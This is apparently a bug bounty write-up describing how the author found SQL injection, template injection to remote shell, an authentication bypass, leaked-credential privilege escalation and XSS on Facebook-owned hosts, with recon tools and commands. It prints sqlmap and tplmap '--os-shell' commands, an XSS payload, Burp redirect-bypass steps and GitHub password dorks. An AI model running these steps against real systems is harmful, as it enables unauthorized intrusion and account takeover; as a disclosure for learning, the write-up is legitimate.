How I Found Multiple Bugs On FaceBook In 1 Month And a Part For My Methodology & Tools

3 years ago 238
BOOK THIS SPACE FOR AD
ARTICLE AD

Orwa Atyat

Hay Hunters , Hello Infosec Community

Iam Orwa [https://twitter.com/GodfatherOrwa]

this my 2nd writeup, the first one is about Full Map To Github Recon And Leaks Exposure Click here to read , seen many people getting hall of fames and bounties from Facebook , Aditi Singh Smart Girl these girl who motivated me to work on this program [https://twitter.com/aditi_singghh]

As you see in the title In these Write up i Will Speak about How I Found Not What I Found

What matters to me here is for the reader to learn

So I will talk about all my discoveries in FaceBook and a part for my methodology

duplicate and accepted

also HackerX007 on bugcrowd Leaderboard rankings Top 10 on P1 , Top 100 on Full Ranking

1 Server-Side Template Injection To RCE (Critical)

2 SQL Injection [2] (Critical)

3 Authentication Bypass(Critical)

4 Privilege Escalation (Critical)

5 Multiple Reflected XSS (Medium)

1 FFUF Or Dirsearch i Like Both

2 Good Word list for me i like to use the legend Random Robbie Word list https://github.com/random-robbie/bruteforce-lists

3 Amass For Sub domain i also check on github for sub domains also you can fuzz for sub domain by using good wordlist the good command that i use for Amass

For List of domains==> amass enum -passive -norecursive -noalts -df list-domains.txt -o subs.txtFor Senile domain==> amass enum -passive -norecursive -noalts -d domain-o subs.txt

4 Httpx and httprobe And Nmap

cat subs.txt | httpx -o live-subs.txtcat sub.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -p https:10000 -p http:9000 -p https:9443 -c 50 | tee live-subs2.txt

5 Wappalyzer Extensions

6 Burp Pro With These Extensions

Collaborator EverywhereXSS ValidatorWsdler.NET BeautifierBypass WAFJ2EEScanParam MinerWayback MachineJS Link FinderUpload ScannerNucleus Burp ExtensionSoftware Vulnerability ScannerActive Scan++

7 Acunetix Scanner or If you Looking for something free and cool [reNgine]

SQL Injection [2] & Authentication Bypass & XSS [2]

Started My Recon By Checking For Some Cool domains by Dorking for Facebook page on Github **Dorking to Find domains and some cool ends

So what that dorks i try

org:facebookresearch ftporg:facebookresearch Ldaporg:facebookresearch https://finely after about 30 min dorking last dork i still remmber

org:facebookresearch language:python .php

i get luck to found some interesting End it was

domain/login/_ajax/verify-2fa.php

When i Visit these Domain its Employee Panel It is owned by Instagram

directly Start Looking for SQL testing query 1' Error back with `MySQL' so now its look Parameter usernamevulnerable

so on burp intercept request and make a copy in txtfile

On Sqlmap i run these Command

sqlmap -r request.txt -p username --dbms="MySQL" --force-ssl --level 5 --risk 3 --dbs --hostname

and BooM its done

So after that i `Spider` the Full host and and fuzz for `php` using php word list and after that Active Scan on Burp for ALL the Post Request

`Keep the Maximum insertion pointe per base request 10`

What i found

another SQL2 XSS payload"><img src=x onerror=alert(1)>

SQL Close as duplicate because The Security testing know about that and they work to fix it also Xss 1 duplicate and 1 accepted

Here HackerX007 He messed around a bit
as he also an artist with manual Testing Found a vary Cool Authentication Bypass

Authentication Bypass That Allow Unauthenticated User To Take ActionsWhen visit domain/location/?5 you will redirect to login pagebut on brup when visit one will redirect but the Content-Length of redirect response so big 6443After looking in the response he found out in this 302 response, the panel was without any Authentication. in the 302 response contentso
after some playing with burp match and replace It was able to bypass Authentication and taking some actions.
at first i was think its just front-end bypass , But i found out i can take action, like enable ,un enable Bucket#Repro Steps1. IN burp match and replace add this:type: response headermatch : HTTP/1.1 302 Foundreplace: HTTP/1.1 200 ok__type: response headermatch : Location: ../login/?redirect=//location/?5replace:
2. now go to domian//location/?5
BooM
4. when you done you can [Logout] 😂

these Authentication Bypass accepted

Started recon for Ip belongs for Facebook

the good dork you can use in these case

if you looking for domains or Ip belong for program

Org:"FaceBook Inc." without 200 dont need live Ip in these case

if you looking for cool subs or Ip on the domain

Ssl.cert.subject.CN:"facebook.com" 200

so found a interesting Ip that include prot 10000 but not working

so i scan that Ip on Nmap Nmap -sV ip

its show Port 8443 Open

when i check it [ its a AWS host owned by Facebook]

now i collect lot of Ip like these and send them to scan on Acunetix to run in background

after about 1 hour back to check on Acunetix its show these Ip vulnerable with SSTI and payload was set in parameter mode that call debug in python so i try the normal payload {{5*5}} so found in source 25 the easy and fast way here to check use tplmap tool its similar for sqlmap to install

git clone https://github.com/epinna/tplmap.git

after testing these parameter its show its vulnerable with SSTI

so my command was

./tplmap.py -u "https://ip:8443/consent?assignmentId=debugKUymD&hitId=debugiwTmj&mode=debug*"

===>

GET parameter: modeEngine: Jinja2Injection: {{*}}Context: textOS: posix-linuxTechnique: render

what make my happy here that

python code evaluation is Ok

that mean i can

execution command on shell
and
Bind and reverse shell
and
File write and read
but not in all the cases

so what i need only connect on shell

./tplmap.py -u "https://ip:8443/consent?assignmentId=debugKUymD&hitId=debugiwTmj&mode=debug*" --os-shell

only check id and ping burp

BooM

these SSTI accepted

here i visit crt.sh to tack about 5 interesting domains

https://crt.sh/?q=Facebook+Inc.

but for subdomains gathering i dont wanna the normal way

i fuzz for sub domains with a good and big word list i made it

you can also made one for you

after that filtered to Live using httprobe

cat sub.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -p https:10000 -p http:9000 -p https:9443 -c 50 | tee live-subs2.txt

so found here domain run on Port 10000

so when i visit it was a interesting panel for mange servers and lot of other things

so when check on its run with lot of technologies

dirsearch on the panel and waw misconfiguration that some endpoints is accessible without any login ok its cool find to report but still

without any Privilege like edit , del , add etc..

so i need to keep working to find something good

i also try login with some default Credentials but not working also try to sing up but the register cant be without login using admin Credentialsby check on some endpoints i found server Info with that info full name of the admin who create that

so its take 5 min to find that employee repo on github

so start dorking on employee repo for any password

i try

password
passwd
pwd
pass
pw
login

found internal host and user and password github leak like these

$host = ************
$User = ************
$pwd = ************

scanned the internal host for ports nothing open

so i try to login use the username and the password and BooM 😎🥳 its work with Full Privilege

after Login i can

Full Access and Control
add users
del users
Etc...

also 1 stored XSS in these panel 😎

I Hope you guys have enjoyed the Reading

and hope you learn and found bugs and tweet by that for me that will make my happy

Stay safe dears

Iam not Good in Writes up If there are spelling mistakes please avoid

The biggest Lie
when they told: it’s not simple
if someone telling you it’s not simple 90% will give up

everything simple in these life
its just need 2 things
1- no matter what happens ==> Never Ever give up

2- Arrange your work Arrange your life Arrange your time
Do not work in any field in life in a random way

Thanks all

https://twitter.com/GodfatherOrwa

Dont forget also Follow HackerX007 I suggest everyone to follow him

https://twitter.com/XHackerx007

Read Entire Article